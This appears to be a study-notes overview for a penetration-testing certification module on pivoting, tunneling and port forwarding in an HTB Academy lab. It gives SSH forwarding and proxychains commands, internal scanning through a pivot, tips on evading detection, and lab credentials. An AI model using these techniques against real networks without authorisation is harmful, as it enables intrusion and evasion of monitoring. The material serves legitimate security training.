This module covers pivoting, tunneling, and port forwarding techniques essential for CPTS certification. Based on HTB Academy's comprehensive course, these techniques allow penetration testers to:
- Pivot: Use compromised machines as stepping stones to access other network segments
- Tunnel: Encapsulate traffic through established connections to bypass network restrictions
- Port Forward: Redirect network traffic from one port to another to access services
- Understanding network segmentation and NAT
- Identifying pivot opportunities
- Traffic flow analysis and routing
- Security implications of tunneling
- SSH port forwarding (Local, Remote, Dynamic)
- SOCKS proxy implementation
- Tool integration through proxychains
- Multiple hop scenarios
- Modern tunneling tools (Chisel, Ligolo-ng)
- DMZ to internal network pivoting
- Firewall bypass techniques
- Multi-segment network traversal
- Maintaining persistent access
[Internet] → [Edge Router] → [Firewall] → [DMZ] → [Internal Firewall] → [LAN]
↓ ↓
Web Servers Workstations
Mail Servers Domain Controllers
Database Servers
- Web servers in DMZ with internal network access
- Jump boxes with multiple network interfaces
- VPN endpoints bridging networks
- Dual-homed hosts spanning network segments
pivoting-tunneling-port-forwarding/
├── pivoting-overview.md # This overview file
├── dynamic-port-forwarding.md # SSH SOCKS tunneling (HTB Page 3)
├── remote-port-forwarding.md # SSH Remote/Reverse forwarding (HTB Page 4)
├── ssh-tunneling.md # Complete SSH forwarding guide
├── proxychains-socks.md # Proxychains configuration and usage
├── chisel-tunneling.md # Modern HTTP tunneling
├── ligolo-ng.md # Next-gen tunneling agent
├── metasploit-pivoting.md # MSF autoroute and pivoting
├── windows-pivoting-tools.md # Windows native tools
├── dns-icmp-tunneling.md # Alternative tunneling protocols
└── skills-assessment.md # Practical scenarios and labs
- Start Here: Dynamic Port Forwarding - HTB Academy Page 3 foundation
- Reverse Shells: Remote Port Forwarding - HTB Academy Page 4 (Meterpreter)
- SSH Mastery: SSH Tunneling - Complete SSH techniques
- Tool Integration: Proxychains & SOCKS - Tool tunneling
- Modern Tools: Chisel and Ligolo-ng
- Framework Integration: Metasploit Pivoting
- Practice: Skills Assessment - Hands-on scenarios
Based on HTB Academy module demonstrating:
- Local Port Forwarding (-L): Access specific services
- Dynamic Port Forwarding (-D): Create SOCKS proxy
- Network Discovery: Scanning internal networks via pivot
- Tool Integration: Nmap, Metasploit, RDP through proxychains
Advanced HTB Academy scenarios covering:
- Remote Port Forwarding (-R): Expose local services to remote networks
- Reverse Shell Pivoting: Meterpreter payload through pivot host
- Network Isolation: When targets can't directly reach attack host
- Payload Delivery: File transfer and execution through pivot
Lab Scenario:
Attack Host (10.10.15.x) ← Ubuntu Server (10.129.202.64) ← Windows Target (172.16.5.19)
MSF Handler :8000 SSH -R :8080 Forward Meterpreter Payload
Network Topology:
Attack Host (10.10.15.x) → Ubuntu Server (10.129.202.64) → Internal Network (172.16.5.0/23)
ens192: 10.129.202.64 ens224: 172.16.5.129
[Attack Host] → [SOCKS Client] → [SSH Tunnel] → [Pivot Host] → [Target Network]
↓ ↓ ↓ ↓ ↓
Tool Request → Proxychains → SSH Port 22 → Internal Interface → Target Service
| Technique | Command | Use Case |
|---|---|---|
| Local Forward | ssh -L 1234:target:3306 user@pivot |
Access specific service |
| Dynamic Forward | ssh -D 9050 user@pivot |
SOCKS proxy for multiple tools |
| Remote Forward | ssh -R 8080:localhost:80 user@pivot |
Expose local service |
| Background Tunnel | ssh -fNT -D 9050 user@pivot |
Persistent background proxy |
# Configure proxychains
echo "socks4 127.0.0.1 9050" >> /etc/proxychains.conf
# Use tools through proxy
proxychains nmap -Pn -sT 172.16.5.19
proxychains msfconsole
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123# Check pivot interfaces
ifconfig # Linux
ipconfig /all # Windows
# Scan internal networks
proxychains nmap -sn 172.16.5.1-200
proxychains nmap -Pn -sT -p 22,80,135,139,443,445,3389 172.16.5.19| Range | Type | Description |
|---|---|---|
10.0.0.0/8 |
Private | Class A private networks |
172.16.0.0/12 |
Private | Class B private networks |
192.168.0.0/16 |
Private | Class C private networks |
169.254.0.0/16 |
Link-Local | APIPA addresses |
127.0.0.0/8 |
Loopback | Localhost |
# Linux
ip route show
ip addr show
arp -a
# Windows
route print
ipconfig /all
arp -a# Test common private ranges
ping -c 1 192.168.1.1
ping -c 1 10.10.10.1
ping -c 1 172.16.1.1
# Port connectivity
nc -zv 192.168.1.100 22
telnet 172.16.5.19 3389# Through SOCKS proxy
proxychains nmap -Pn -sT --top-ports 1000 172.16.5.0/24
proxychains masscan -p1-65535 --rate=1000 172.16.5.0/24| Tool | SSH Tunnel | SOCKS Proxy | HTTP Tunnel | Notes |
|---|---|---|---|---|
| Nmap | ✅ (Local Forward) | ✅ (TCP Connect only) | ✅ | Use -sT scan type |
| Metasploit | ✅ | ✅ | ✅ | Full framework support |
| Web Browsers | ✅ | ✅ | ✅ | Configure proxy settings |
| cURL/wget | ✅ | ✅ | ✅ | Use --proxy flag |
| Database Tools | ✅ | ✅ | ✅ | Connect to forwarded ports |
| RDP/VNC | ✅ | ✅ | ✅ | Remote desktop access |
- Encrypt tunnels when possible (SSH, HTTPS)
- Mimic legitimate traffic patterns
- Use standard ports when feasible (80, 443, 53)
- Clean up connections after assessment
- Monitor tunnel stability and performance
- DPI (Deep Packet Inspection) may detect tunneling
- Traffic analysis can reveal unusual patterns
- Connection monitoring may alert on new services
- Log correlation might expose pivot activities
| Problem | Cause | Solution |
|---|---|---|
| Connection timeout | Firewall blocking | Try different ports/protocols |
| DNS resolution fails | DNS not proxied | Enable proxy_dns in proxychains |
| Slow performance | Network latency | Use compression (-C flag) |
| Tool incompatibility | Partial packet support | Use TCP connect scans only |
# Check tunnel status
netstat -antp | grep :9050
ss -tlnp | grep :9050
# Test connectivity
nc -v 127.0.0.1 9050
telnet 127.0.0.1 9050
# Verbose output
proxychains -v nmap target
ssh -v -D 9050 user@pivotCredentials:
- Ubuntu Server:
ubuntu:HTB_@cademy_stdnt! - Windows Target:
victor:pass@123
Network Topology:
Attack Host → Ubuntu Server (10.129.202.64) → Windows DC (172.16.5.19)
ens192: 10.129.202.64 ens224: 172.16.5.129
Objectives:
- Enumerate network interfaces on pivot
- Set up SOCKS proxy via SSH
- Scan internal network through proxy
- Access Windows host via RDP
- Retrieve flag from Desktop
- Map network topology
- Identify trust relationships
- Locate multi-homed hosts
- Test basic connectivity
- Use encrypted tunnels
- Monitor connection stability
- Document tunnel configurations
- Test tool compatibility
- Clean up all connections
- Remove configuration files
- Document findings
- Verify cleanup completion
- Quick tunnel setup under time pressure
- Tool integration through proxies
- Multi-hop scenarios planning
- Troubleshooting common issues
- Documentation of pivot paths
- Set up tunnels in under 2 minutes
- Chain multiple pivots successfully
- Use various tools through proxies
- Handle connection failures gracefully
- Maintain operational security
- Start with Dynamic Port Forwarding: Review HTB Academy Page 3 concepts
- Practice SSH Tunneling: Master all forwarding types
- Learn Proxychains: Configure and use with various tools
- Explore Modern Tools: Chisel and Ligolo-ng alternatives
- Complete Skills Assessment: Hands-on lab scenarios
- HTB Academy: Pivoting, Tunneling & Port Forwarding Module
- SSH Documentation:
man ssh,man ssh_config - Proxychains:
/etc/proxychains.confconfiguration - SOCKS Protocol: RFC 1928 (SOCKS5), RFC 1929 (Authentication)
- Network Fundamentals: RFC 1918 (Private Address Space)